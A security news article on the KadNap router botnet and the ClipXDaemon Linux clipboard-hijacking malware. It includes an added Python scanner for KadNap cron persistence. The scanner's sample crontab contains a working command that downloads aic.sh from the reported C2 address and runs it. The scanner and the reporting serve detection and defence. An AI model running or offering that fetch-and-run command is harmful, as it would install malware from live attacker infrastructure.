KadNap Malware Compromises Over 14,000 Edge Devices to Build Stealth Proxy Botnet

Cybersecurity researchers have uncovered a sophisticated malware campaign involving a threat dubbed KadNap, which primarily targets Asus routers and other edge devices to build a stealthy proxy botnet. The malware has compromised over 14,000 devices globally, with more than 60% of infections in the U.S., according to Black Lotus Labs at Lumen.

KadNap uses a custom implementation of the Kademlia Distributed Hash Table (DHT) protocol, enabling devices to connect with command-and-control (C2) servers in a peer-to-peer network that hides malicious traffic within legitimate network activity. This makes the botnet resilient to detection and disruption.

Infection and Deployment Mechanism

The attack begins with a shell script named aic.sh, downloaded from the C2 server (212.104.141[.]140). This script creates a cron job to fetch itself every hour, renames the file to .asusrouter, and executes it. The script subsequently downloads a malicious ELF binary called kad, which deploys KadNap on ARM and MIPS-based devices.

KadNap collects system uptime and NTP server time to generate a hash that helps locate peers in the decentralized network. The malware also closes SSH port 22 and extracts C2 IP addresses and ports for communication.
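As an added illustration (not code from the article or from the researchers cited in it), the following Python scanner checks a crontab dump for the persistence pattern described above: an hourly job that fetches aic.sh from the reported C2 address and runs it as .asusrouter. The sample crontab is constructed for the example; only the indicators come from the article.

```python
"""Scan a crontab dump for the KadNap persistence pattern described in the article."""
import re

# Indicators as reported in the article. The C2 address is written de-fanged
# ("[.]") here and normalized before matching so pasted IoC feeds also work.
C2_ADDRESS = "212.104.141[.]140"
DROPPER_NAME = "aic.sh"
PERSISTENCE_NAME = ".asusrouter"

# A cron entry with a fixed minute and "*" in every other field runs once per hour.
HOURLY_RE = re.compile(r"^\s*\d{1,2}\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp)\b")

# Constructed sample crontab, not a real capture from an infected device.
SAMPLE_CRONTAB = """\
# constructed sample for illustration
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
0 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
"""


def refang(value):
    """Turn a de-fanged indicator such as 1.2.3[.]4 into its literal form."""
    return value.replace("[.]", ".")


def scan_crontab(crontab_text):
    """Return a list of (line_no, reasons) for cron entries matching the indicators."""
    c2 = refang(C2_ADDRESS)
    findings = []
    for line_no, raw in enumerate(crontab_text.splitlines(), start=1):
        line = refang(raw)
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # skip blank lines and comments
        reasons = []
        if c2 in line:
            reasons.append("references reported C2 address")
        if DROPPER_NAME in line:
            reasons.append("references dropper aic.sh")
        if PERSISTENCE_NAME in line:
            reasons.append("references renamed file .asusrouter")
        hourly = HOURLY_RE.match(line)
        if reasons and hourly and DOWNLOADER_RE.search(hourly.group("cmd")):
            reasons.append("hourly job that re-downloads its own dropper")
        if reasons:
            findings.append((line_no, reasons))
    return findings


if __name__ == "__main__":
    for line_no, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: " + "; ".join(reasons))
```

On a live device the same check can be fed the output of `crontab -l` or the contents of the cron spool; a hit warrants inspecting the referenced file and the device's outbound connections rather than just deleting the entry.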

Once deployed, compromised devices are marketed through a proxy service called Doppelgänger (doppelganger[.]shop), a rebrand of Faceless, offering proxies in over 50 countries with claims of “100% anonymity.” Bots from these devices are reportedly abused by threat actors in the wild.

Defensive Recommendations

SOHO router users are advised to:

  • Keep firmware updated
  • Reboot devices regularly
  • Change default passwords
  • Secure management interfaces
  • Replace unsupported or end-of-life devices

The KadNap botnet is notable for using a peer-to-peer network to avoid detection, making it difficult for defenders to contain malicious proxy activity.

New Linux Threat: ClipXDaemon Targets Cryptocurrency Users

In a related disclosure, cybersecurity firm Cyble revealed a new Linux malware called ClipXDaemon. This clipper malware targets cryptocurrency users by intercepting copied wallet addresses in X11 sessions and replacing them with attacker-controlled addresses in real time.

The malware operates entirely in memory, avoids Wayland sessions to bypass security controls, and employs stealth techniques such as process masquerading. ClipXDaemon affects wallets for Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON. Unlike traditional malware, it contains no command-and-control logic and monetizes victims directly through clipboard hijacking.
